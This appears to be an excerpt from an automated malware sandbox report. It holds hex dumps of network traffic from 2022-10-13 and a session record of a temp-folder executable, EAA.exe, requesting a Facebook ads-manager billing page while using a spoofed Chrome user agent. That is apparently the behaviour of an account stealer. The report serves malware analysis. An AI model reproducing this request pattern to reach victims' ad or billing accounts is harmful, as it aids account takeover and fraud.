02 00 00 00 d8 56 47 00 02 00 00 00 dc 56 47 00 02 00 00 00 e0 56 47 00 02 00 00 00
                                                                                                                Data Ascii: HhVGlVGpVGtVGxVG|VGVGVGh9GVGVGOGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVGVG
                                                                                                                2022-10-13 11:08:14 UTC4561INData Raw: 65 76 65 6c 6f 70 65 72 44 69 61 67 6e 6f 73 74 69 63 00 12 00 00 00 41 70 70 50 6f 6c 69 63 79 47 65 74 57 69 6e 64 6f 77 69 6e 67 4d 6f 64 65 6c 00 00 05 00 00 00 10 00 00 00 53 65 74 54 68 72 65 61 64 53 74 61 63 6b 47 75 61 72 61 6e 74 65 65 00 0c 00 00 00 0f 00 00 00 53 79 73 74 65 6d 46 75 6e 63 74 69 6f 6e 30 33 36 00 00 00 00 00 00 00 00 00 38 43 00 00 00 00 00 00 38 43 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f ff ff ff ff ff ff ff 7f ff ff ff ff ff ff ff 7f 31 67 8a e7 7f d8 55 3f bf a0 04 d7 08 6b ac 3f 77 4e ba 6f ab b2 83 3f 8e c5 82 ff bd bf ce 3f ef 39 fa fe 42 2e e6 3f 00 00 00 f8 ff ff ff ff 00 00 00 40 47 15 f7 bf 01 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 ff
                                                                                                                Data Ascii: eveloperDiagnosticAppPolicyGetWindowingModelSetThreadStackGuaranteeSystemFunction0368C8C??1gU?k?wNo??9B.?@G
                                                                                                                2022-10-13 11:08:14 UTC4577INData Raw: 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef 3f 00 00 00 00 80 c3 ef 3f 00 00 00 00 80 c2 ef 3f 00 00 00 00 80 c1 ef 3f 00 00 00 00 00 10 f0 3f 00 00 00 00 c0 0f f0 3f 00 00 00 00 80 0f f0 3f 00 00 00 00 40 0f f0 3f 00 00 00 00 00 0f f0 3f 00 00 00 00 c0 0e f0 3f 00 00 00 00 80 0e f0 3f 00 00 00 00 40 0e f0 3f 00 00 00 00 00 0e f0 3f 00 00 00 00 c0 0d f0 3f
                                                                                                                Data Ascii: @?@?@?@??????????????????????@????@???
                                                                                                                2022-10-13 11:08:14 UTC4593INData Raw: b6 4b 00 b8 12 48 00 00 00 00 00 01 00 00 00 05 00 00 00 c8 12 48 00 e0 12 48 00 88 12 48 00 9c 25 48 00 f4 24 48 00 a8 24 48 00 00 00 00 00 14 b6 4b 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 b8 12 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 b6 4b 00 10 13 48 00 00 00 00 00 01 00 00 00 04 00 00 00 20 13 48 00 34 13 48 00 9c 25 48 00 f4 24 48 00 a8 24 48 00 00 00 00 00 40 b6 4b 00 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 10 13 48 00 00 00 00 00 00 00 00 00 00 00 00 00 68 b6 4b 00 64 13 48 00 00 00 00 00 01 00 00 00 04 00 00 00 74 13 48 00 88 13 48 00 9c 25 48 00 f4 24 48 00 a8 24 48 00 00 00 00 00 68 b6 4b 00 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 64 13 48 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: KHHHH%H$H$HK@H@KH H4H%H$H$H@K@HhKdHtHH%H$H$HhK@dH
                                                                                                                2022-10-13 11:08:14 UTC4609INData Raw: 52 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 41 ff 46 00 00 00 00 00 49 ff 46 00 22 05 93 19 02 00 00 00 cc 52 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff d7 ff 46 00 00 00 00 00 df ff 46 00 22 05 93 19 02 00 00 00 00 53 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff cd 0a 47 00 22 05 93 19 01 00 00 00 34 53 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 06 00 00 00 84 53 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 19 17 47 00 ff ff ff ff 3b 22 42 00 ff ff ff ff 21 17 47 00 02 00 00 00 29 17 47 00 02 00 00 00 31 17 47 00 ff ff ff ff
                                                                                                                Data Ascii: RHAFIF"RHFF"SHG"4SH"SHG;"B!G)G1G
                                                                                                                2022-10-13 11:08:14 UTC4625INData Raw: 16 4e 7e 5e 27 4a 7e 3c 26 4a 6f 4d 13 4a 7e 34 2c 48 61 34 ab 11 7e 3e 27 6f ae f1 26 4a 7a 16 3a 4a 7e 34 55 57 7e 3e 2c 62 42 3e 26 40 75 39 0e 77 7e 3e 2c 67 79 38 2b 97 55 3f 26 4a 7c 16 21 4a 7e 38 2a 4d 0d 67 26 4a 78 2d 22 5b 7a 22 ab 11 7e 3e 27 6f ae a3 26 4a 7a 16 3a 4a 7e 34 55 57 7e 3e 2c 25 22 3e 26 4c 58 28 35 4f 46 e2 26 4a 7e 4d f6 4a 7e 38 35 4c 6f 38 37 4e 6f 3b 30 25 20 3e 26 4c 11 00 26 4a 74 51 ed 4a 7e 38 37 4c 6f 3a 37 4f 67 51 78 4a 7e 38 49 74 7e 3e 2c 25 b3 3e 26 4c 6f 38 37 4e 6f 3b 3d 25 20 3e 26 4c 76 16 20 4a 7e 38 49 85 7e 3e 20 94 7d 18 f8 4a a0 54 37 4c 6f 38 49 80 7e 3e 20 62 41 3e 26 40 53 37 37 4c 11 f4 26 4a 78 15 23 38 09 3e 26 3a 11 f5 26 4a 78 2f 20 5b 78 51 ea 4a 7e 38 0e 75 7e 3e 2c 67 77 2f 20 25 b2 3e 26 4c 55
                                                                                                                Data Ascii: N~^'J~<&JoMJ~4,Ha4~>'o&Jz:J~4UW~>,bB>&@u9w~>,gy8+U?&J|!J~8*Mg&Jx-"[z"~>'o&Jz:J~4UW~>,%">&LX(5OF&J~MJ~85Lo87No;0% >&L&JtQJ~87Lo:7OgQxJ~8It~>,%>&Lo87No;=% >&Lv J~8I~> }JT7Lo8I~> bA>&@S77L&Jx#8>&:&Jx/ [xQJ~8u~>,gw/ %>&LU
                                                                                                                2022-10-13 11:08:14 UTC4641INData Raw: 26 67 7e 7c 49 4a 7d 2f 26 4a 7f 3c 26 69 7e 64 5b 4a 70 3e 26 4a 7e 20 24 62 1e 3e 26 4c 54 2d 16 4e 7e be 26 4a 7e 3e 26 4a 7e 3c 0e 2c 7e 3e 2c 48 61 34 ab 11 7e 3e 27 6f ae 90 26 4a 7a 16 3a 4a 7e 34 55 57 7e 3e 2c 34 62 3f 26 4e 5b 13 31 6c 00 25 27 4a 7a c0 20 db 7f 3e 20 39 84 3e 26 40 5b be 3a 4b 7e 3a 0e 5e 7e 3e 0d 62 6b 3e 26 61 03 34 26 4a 7a 3c 25 62 1b 3e 26 4c 03 32 26 4a 7a 3c 24 55 6e 26 0e 15 7e 3e 20 37 73 3e 26 4e 7c 3c 39 72 64 16 79 4a 7e 38 5b 41 7e 3e 22 48 61 5a 4c 62 25 3e 26 4c 54 25 16 49 7e 65 26 4a 7e 15 26 4a 6f 2b 2c 48 05 30 26 4a 7a b0 4f 5d 27 35 30 46 55 12 24 31 70 3e 26 4e 76 a4 49 b1 7e 3e 2c 25 40 3e 26 40 7a 51 dd 4a 7e 34 49 74 7e 3e 2c 25 82 3e 26 40 53 3a 2e 40 55 36 2e 5d 26 32 2e 4d 4f ee 20 5f 4d 3a 32 47 a0
                                                                                                                Data Ascii: &g~|IJ}/&J<&i~d[Jp>&J~ $b>&LT-N~&J~>&J~<,~>,Ha4~>'o&Jz:J~4UW~>,4b?&N[1l%'Jz > 9>&@[:K~:^~>bk>&a4&Jz<%b>&L2&Jz<$Un&~> 7s>&N|<9rdyJ~8[A~>"HaZLb%>&LT%I~e&J~&Jo+,H0&JzO]'50FU$1p>&NvI~>,%@>&@zQJ~4It~>,%>&@S:.@U6.]&2.MO _M:2G
                                                                                                                2022-10-13 11:08:14 UTC4657INData Raw: 26 09 5a 07 1a 4c 7e c7 10 80 54 38 26 ca 7b a6 3a 4c 7e 41 23 d2 62 38 26 3b 7b a6 3a 01 7e ea 16 4a 7e 38 26 e8 53 f4 0c 4c 7e 02 04 80 54 38 26 69 7b f4 0c 4c 7e 40 2e 80 54 38 26 62 5a e0 17 44 7e 00 09 06 54 38 26 e0 4e 1e 13 4c 7e 38 07 80 54 30 26 2f 5e 72 0c 4c 7e 54 08 46 62 30 26 4c 46 72 0c 40 7e 66 23 94 4f 38 26 ca 74 f4 0c 40 7e 30 02 94 4f 38 26 b0 5e 1e 13 58 7e 2b 0c b9 57 2c 26 b4 50 5b 12 40 7e 29 02 94 4f 38 26 a9 72 f4 0c 4c 7e 02 05 80 54 38 26 5e 70 f4 0c 4c 7e 5f 0b 46 62 38 26 ae 5b f4 0c 4c 7e cf 0b 46 62 38 26 7f 7b a6 3a 4c 7e bb 2e d2 62 38 26 de 51 a0 1f 5c 7e 64 0e af 4a 38 26 a3 44 ff 20 4c 7e d4 05 80 54 38 26 d0 49 f4 0c 4c 7e 5a 0f 80 54 38 26 d8 53 f4 0c 50 7e 14 01 67 56 38 26 ba 54 f4 0c 4c 7e b9 2c 80 54 38 26 31 54
                                                                                                                Data Ascii: &ZL~T8&{:L~A#b8&;{:~J~8&SL~T8&i{L~@.T8&bZD~T8&NL~8T0&/^rL~TFb0&LFr@~f#O8&t@~0O8&^X~+W,&P[@~)O8&rL~T8&^pL~_Fb8&[L~Fb8&{:L~.b8&Q\~dJ8&D L~T8&IL~ZT8&SP~gV8&TL~,T8&1T
                                                                                                                2022-10-13 11:08:14 UTC4673INData Raw: 36 89 7c 35 26 e5 6e fa 24 c1 7e 91 36 83 7c a5 26 30 65 df 24 31 7e 91 36 a9 7c 35 26 e5 6e d7 24 d1 7e b4 3d 4b 7d 45 26 e5 6e 3d 25 41 7e 91 36 43 7d a5 26 c1 60 1f 25 31 7e 91 36 63 7d a5 26 20 65 7f 25 31 7e 91 36 0e 7d b5 26 e5 6e 77 25 d1 7e 44 3d 2b 7d 45 26 e5 6e 57 25 d1 7e b4 3d cb 7d 45 26 e5 6e b7 25 d1 7e a5 38 eb 7d 45 26 e5 6e 97 25 d1 7e 54 3d 8b 7d 45 26 e5 6e f7 25 d1 7e 44 3d ab 7d 45 26 e5 6e d7 25 d1 7e b4 3d 4b 7a 45 26 e5 6e 3d 22 d9 7e a4 3d 6b 7a 45 26 e5 6e 1d 22 d9 7e ff 3d 63 7a a5 26 20 65 7f 22 31 7e 91 36 09 7a ad 26 a2 65 77 22 d1 7e 44 3d 2b 7a 45 26 e5 6e 5d 22 d9 7e 2e 3a 23 7a a5 26 c0 65 bf 22 31 7e 91 36 c9 7a ad 26 72 62 b7 22 d1 7e 54 3d eb 7a 45 26 e5 6e 97 22 d1 7e 44 3d 8b 7a 45 26 e5 6e f7 22 d1 7e b4 3d ab 7a
                                                                                                                Data Ascii: 6|5&n$~6|&0e$1~6|5&n$~=K}E&n=%A~6C}&`%1~6c}& e%1~6}&nw%~D=+}E&nW%~=}E&n%~8}E&n%~T=}E&n%~D=}E&n%~=KzE&n="~=kzE&n"~=cz& e"1~6z&ew"~D=+zE&n]"~.:#z&e"1~6z&rb"~T=zE&n"~D=zE&n"~=z
                                                                                                                2022-10-13 11:08:14 UTC4689INData Raw: 63 24 1d 51 42 23 10 59 26 2d 1b 4a 79 09 0b 4c 54 2f 10 4a 63 24 1d 51 42 23 10 59 26 19 07 4d 52 2f 13 10 62 38 1f 49 4f 24 19 10 6f 27 1f 59 4f 24 19 3e 75 33 0d 4a 43 27 50 6c 53 24 0a 57 4b 2f 50 68 43 38 0d 57 49 24 17 50 41 4a 2a 51 75 3e 0c 57 48 2d 7e 79 43 3e 2d 4a 54 23 10 59 26 0d 1b 4a 6e 2f 06 6d 52 38 17 50 41 4a 2d 4b 44 39 0a 4c 4f 24 19 3e 75 33 0d 4a 43 27 50 7a 54 2b 09 57 48 2d 7e 7d 49 24 08 5b 54 3e 2a 51 73 06 11 50 41 4a 12 51 41 4a 0d 5d 47 24 10 5b 54 0b 0c 59 26 07 1f 4a 45 22 7e 79 43 3e 33 5a 13 02 1f 4d 4e 4a 3d 51 4b 3a 0b 4a 43 02 1f 4d 4e 4a 33 5f 52 22 7e 5a 44 1a 1f 4a 4e 4a 0e 4c 49 2c 17 52 43 1a 1f 4a 4e 4a 39 5b 52 0c 11 52 42 2f 0c 6e 47 3e 16 3e 54 25 11 4a 76 2b 0a 56 26 3a 1f 4a 4e 4a 19 5b 52 15 29 57 42 3e 16
                                                                                                                Data Ascii: c$QB#Y&-JyLT/Jc$QB#Y&MR/b8IO$o'YO$>u3JC'PlS$WK/PhC8WI$PAJ*Qu>WH-~yC>-JT#Y&Jn/mR8PAJ-KD9LO$>u3JC'PzT+WH-~}I$[T>*QsPAJQAJ]G$[TY&JE"~yC>3ZMNJ=QK:JCMNJ3_R"~ZDJNJLI,RCJNJ9[RRB/nG>>T%Jv+V&:JNJ[R)WB>
                                                                                                                2022-10-13 11:08:14 UTC4705INData Raw: 34 02 7a 1e 27 4f 7d 38 06 4b 7c 2c a6 da 78 1e 27 48 6c be a2 47 5e 3f 33 58 fe 87 27 58 fe ae 34 ca fa 30 06 4c 6c be f7 5a 66 30 28 43 6c be f3 56 76 1e 24 43 6e 26 34 ca af 35 06 4e 6c be f7 52 77 2c a6 9f 62 38 06 4b 77 2c a6 9b 6f 1e 2e 58 fe ef 3e 44 63 3b 2e 5a 76 37 34 ca ab 22 2e 6a 7c 37 36 42 6c be f7 45 5e 39 34 ca af 26 28 57 7b 36 2e 58 fe eb 3a 5e 5e 35 34 ca af 26 3e 44 6e 26 3e 42 63 3b 2e 43 6c be f3 56 74 1e 25 58 fe ef 3e 58 fe eb 3a 50 5e 32 34 ca af 26 3b 4f 76 2e 37 ca ea 23 23 42 63 3b 2e 5a 76 36 34 ca ab 22 2a 6a 7d 37 36 5b fe aa 36 42 6c be f7 4c 5e 3f 24 58 ff 1b 20 6a 7f 30 34 cb 3f 3b 2e 4a 63 2c 6e 49 56 3e 2e 4f 76 3e 34 ca 8f 3d 0e 4a 66 3d 0e 4a 70 37 0e 4a 6b 2c 6b 4b 6c be b6 43 56 3e 33 58 33 3f 34 ca fe 37 0e 4a 6b
                                                                                                                Data Ascii: 4z'O}8K|,x'HlG^?3X'X40LlZf0(ClVv$Cn&45NlRw,b8Kw,o.X>Dc;.Zv74".j|76BlE^94&(W{6.X:^^54&>Dn&>Bc;.ClVt%X>X:P^24&;Ov.7##Bc;.Zv64"*j}76[6BlL^?$X j04?;.Jc,nIV>.Ov>4=Jf=Jp7Jk,kKlCV>3X3?47Jk
                                                                                                                2022-10-13 11:08:14 UTC4721INData Raw: 9e 33 03 6a 8c bd 79 e2 18 47 98 d9 a0 c1 9b ae 7b d7 07 b0 fc 1b a4 63 9f bd 10 36 02 f5 0c e7 05 4a 9d c3 e5 9d 48 93 fa ea 75 c5 28 6a 7a d1 89 d8 5a 3a db 3a 13 4d f5 7c 06 99 f4 7c 80 2a e5 50 7f 1a 40 19 30 12 65 34 73 2f d7 63 9d e2 69 e8 50 92 4c 70 09 3e 2f 35 88 69 6f fe 61 32 2b 0b da 0c fe 9f 47 f7 97 38 a1 b4 9c fa d4 b7 c0 a1 be 2f 98 95 5c a0 d5 41 84 d3 15 72 8c 45 a9 ad 63 18 f6 dc d6 35 8d 50 b1 23 26 7b 25 70 74 bc af 79 3f b8 65 fc d0 c6 f4 d9 ef 23 cb f1 25 32 c8 1d e3 fb 0c 21 5c 20 a4 a8 75 1b e9 69 13 cf 63 be 2f b3 73 e1 48 ef 88 a7 b8 8b 59 e1 27 ba 55 e6 59 da 8a 4d 26 f9 e1 a2 90 33 33 ea a3 9e 3f 24 9f 31 2e 86 bb 9e 0f 5d 33 97 1e 37 f9 03 69 d3 71 34 93 fb 1a 22 e5 60 a6 83 ed ed 4c 51 7e 02 dc ba e4 37 99 49 4e 3f e6 ff 7e
                                                                                                                Data Ascii: 3jyG{c6JHu(jzZ::M||*P@0e4s/ciPLp>/5ioa2+G8/\ArEc5P#&{%pty?e#%2!\ uic/sHY'UYM&33?$1.]37iq4"`LQ~7IN?~
                                                                                                                2022-10-13 11:08:14 UTC4737INData Raw: 9b 56 81 cf 9b 56 81 cf 9b 51 81 cf 9b 51 81 cf 9b 51 81 cf 9b 51 81 cf 9b 50 81 cf 9b 50 81 cf 9b 50 81 cf 9a 53 81 cf 9a 53 81 cf 9a 53 81 cf 9a 52 81 cf 9a 52 81 cf 9a 52 81 ce 9a 5d 81 ce 9a 5d 81 ce 9a 5d 81 ce 9d 5c 81 ce 9d 5c 81 ce 9d 5c 81 ce 9d 5f 81 ce 9d 5f 81 b2 53 7b 81 6f 6d 0a 81 6f 6d 0a 81 6f 6d 0a 81 6e 6d 75 81 6e 6d 75 81 6e 6c 75 51 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 74 90 25 09 74 90 25 81 74 90 25 81 77 90 25 81 77 90 25 81 77 90 25 81 77 90 24 81 77 90 24 81 77 90 24 81 76 93 24 81 76 93 24 81 76 93 24 81
                                                                                                                Data Ascii: VVQQQQPPPSSSRRR]]]\\\__S{omomomnmunmunluQ>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~t%t%t%w%w%w%w$w$w$v$v$v$
                                                                                                                2022-10-13 11:08:14 UTC4753INData Raw: 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e
                                                                                                                Data Ascii: &J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~
                                                                                                                2022-10-13 11:08:14 UTC4769INData Raw: e6 6c 81 cf e6 6f 81 cf e6 6f 81 cf e6 6f 81 cf 99 6e 81 cf 99 6e 81 cf 99 6e 81 cf 99 69 81 cf 99 69 81 cf 99 69 81 cf 99 68 81 cf 99 68 81 cf 99 68 81 cf 99 68 81 cf 99 6b 81 cf 99 6b 81 cf 99 6b 81 cf 98 6a 81 cf 98 6a 81 cf 98 6a 81 cf 98 55 81 cf 98 55 81 cf 98 55 81 ae 5c 73 81 66 75 02 81 66 75 02 81 69 74 02 81 69 74 02 81 69 74 02 81 69 77 0d 4e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 6a 69 0e 51 6b 69 0e 81 6a 68 09 81 6a 68 09 81 6a 68 09 81 6d 68 09 81 ae 5b 09 81 cd ef 0f 81 cd ef 0f 81 cd ef 0f 81 cd ef 0f 81 cd ef 0e 81 cd ef 0e 81 cd ef 0e 81 cd ef 09 81 cf e6 6f 81 ce 9d 5e 81 ce 9d 59 81 ce 9d 59 81 ce 9d 59 81 ce 9c 58 81 ce 9c 58 81 ce 9c 58 81 ce 9c 5b 81
                                                                                                                Data Ascii: looonnniiihhhhkkkjjjUUU\sfufuitititiwN>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~jiQkijhjhjhmh[o^YYYXXX[
                                                                                                                2022-10-13 11:08:14 UTC4785INData Raw: 7b 19 81 5f 7a 18 81 5f 7a 18 81 5f 7a 18 81 5e 7d 1b 81 5e 7d 1b 81 5e 7d 1b 81 5e 7d 1a 81 5e 7d 1a 81 5e 7d 1a 81 61 7c 1a 81 61 7c 1a 81 61 7c 1a 81 60 7f 05 81 60 7f 05 81 60 7f 05 81 63 7e 04 81 63 7e 04 81 63 7e 04 81 63 7e 07 81 63 7e 07 81 63 7e 07 81 62 71 06 81 62 71 06 81 62 71 06 dd 64 72 00 76 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 68 76 0f 76 69 77 0d dd 69 77 0d 81 68 77 0c 81 68 77 0c 81 68 77 0c 81 6b 76 0f 81 6b 76 0f 81 6b 76 0f 81 6b 69 0e 81 6b 69 0e 81 6b 69 0e 81 6a 68 09 81 6a 68 09 81 6a 68 09 81 6a 68 09 81 6d 68 09 81 6d 68 09 81 6d 68 09 81 6c 6b 08 81
                                                                                                                Data Ascii: {_z_z_z^}^}^}^}^}^}a|a|a|```c~c~c~c~c~c~bqbqbqdrv>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~>&J~hvviwiwhwhwhwkvkvkvkikikijhjhjhjhmhmhmhlk
                                                                                                                2022-10-13 11:08:14 UTC4801INData Raw: e6 6c 81 cf e6 6c 81 cf e6 6f 81 cf 99 6e 81 cf 99 6e 81 cf 99 69 81 cf 99 68 81 cf 99 68 81 cf 99 6b 81 cf 99 6b 81 cf 98 6a 81 4b 4e 0b 81 67 72 03 81 66 75 02 81 66 74 02 66 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 3e 26 4a 7e 6b 69 0f 66 6b 69 0e 81 6b 69 0e 81 4c 40 09 81 cd ec 0c 81 cd ef 0f 81 cd ef 0f 81 cd ef 0f 81 cf 98 54 81 ce 9d 5e 81 ce 9d 5e 81 ce 9d 59 81 ce 9c 58 81 ce 9c 58 81 ce 9c 5b 81 ce 9c 5b 81 ce 9c 5a 81 ce 9f 45 81 ce 9f 45 81 ce 9f 44 81 ce 9f 47 81 ce 9f 47 81 ce 9e 46 81 ce 9e 41 81 ce 9e 41 81 ce 9e 40 81 ce 9e 43 81 66 6b 79 81 76 64 7c 81 79 67 7c 81 58 47 1d 81 58 47 1d 81 4d 4d 1c 81 ca e9 12 81 ca e9 12 81 ca e8 1d 81 ca e8 1c 81 cd e3 7d 81 cc e7 61 81 cc e7 61 81 cc e7 60 81 cc e7 63 81 cc e7 63 81 cc e7 62 81 cf e6 6d 81
                                                                                                                Data Ascii: llonnihhkkjKNgrfuftf>&J~>&J~>&J~>&J~kifkikiL@T^^YXX[[ZEEDGGFAA@Cfkyvd|yg|XGXGMM}aa`ccbm
                                                                                                                2022-10-13 11:08:14 UTC4817INData Raw: ef 09 81 cd ee 08 81 ce 9d 5c 81 ce 9c 5b 81 ce 9f 45 81 ce 9f 44 81 ce 9f 47 81 ce 9e 41 81 ce 9e 40 81 ce 9e 43 81 ce 91 42 81 9f a6 56 81 78 66 7e 83 5d 78 1f 81 8c bd 1f 81 ca e8 1f 81 cd ef 0f 81 cc e7 62 81 cf e6 6d 81 cf e6 6c 81 cf 99 6e 81 cf 99 69 81 cf 99 68 81 cf 99 6b 81 cf 98 55 81 cf 98 54 81 5b 7a 0e 81 69 77 0d f5 3e 26 4a 7e 3e 26 4a 7e 6d 68 09 f5 5c 7f 08 81 cd ef 0e 81 cd ef 09 81 ce 9a 5d 81 ce 9c 5b 81 ce 9c 5a 81 ce 9f 45 81 ce 9f 47 81 ce 9e 46 81 ce 9e 41 81 ce 9e 43 81 ce 91 42 81 9c a7 56 81 78 67 7f 81 5a 79 1f 81 8c bd 1c 81 ca e8 1f 81 cd ef 0f 81 cc e7 63 81 cc e7 62 81 cf e6 6c 81 cf e6 6f 81 cf 99 6e 81 cf 99 68 81 cf 99 6b 81 cf 98 6a 81 cf 98 55 81 5b 7a 0e 81 69 77 0d f5 3e 26 4a 7e 3e 26 4a 7e 6a 68 09 f5 5c 7c 09 81
                                                                                                                Data Ascii: \[EDGA@CBVxf~]xbmlnihkUT[ziw>&J~>&J~mh\][ZEGFACBVxgZycblonhkjU[ziw>&J~>&J~jh\|
                                                                                                                2022-10-13 11:08:14 UTC4833INData Raw: 30 9e 30 a4 30 03 31 0c 31 38 31 59 31 64 31 77 31 7e 31 dc 31 f4 31 7a 32 aa 32 fe 32 1b 33 35 33 4b 33 58 33 c1 33 fb 33 34 34 64 34 7c 34 ac 34 d9 34 f1 34 d0 36 01 37 11 37 29 37 3f 37 98 37 a3 37 b1 37 bf 37 d0 37 eb 37 fd 37 16 38 1f 38 6c 38 99 38 a8 38 ba 38 dc 38 17 39 7a 39 8e 39 94 39 df 39 ed 39 00 3a 2c 3a 43 3a 8c 3a c0 3a fb 3a 1a 3b 26 3b 63 3b 76 3b ab 3b be 3b fb 3b 1e 3c 4f 3c 5f 3c 72 3c af 3c b8 3c c8 3c 08 3d 30 3d 37 3d 40 3d 50 3d 60 3d 78 3d 81 3d a2 3d f5 3d f9 3d fd 3d 01 3e 05 3e 09 3e 0d 3e 11 3e 1d 3e 25 3e 83 3e c5 3e dc 3e f9 3e 0a 3f 1d 3f 79 3f a7 3f af 3f c7 3f 00 00 00 b0 02 00 c0 00 00 00 2a 30 57 30 76 30 83 30 e8 30 15 31 31 31 8e 31 be 31 1c 32 28 32 3f 32 49 32 6c 32 ea 32 5e 33 b0 33 cf 33 15 34 b6 34 f0 34 08 35
                                                                                                                Data Ascii: 0001181Y1d1w1~111z222353K3X33344d4|4444677)7?7777777788l888889z99999:,:C::::;&;c;v;;;;<O<_<r<<<<=0=7=@=P=`=x======>>>>>>%>>>>>??y????*0W0v000111112(2?2I2l22^3334445


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                7192.168.2.549729157.240.20.35443C:\Users\user\AppData\Local\Temp\EAA.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:14 UTC4847OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                Host: www.facebook.com
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                viewport-width: 1920
                                                                                                                sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                sec-ch-ua-mobile: ?0
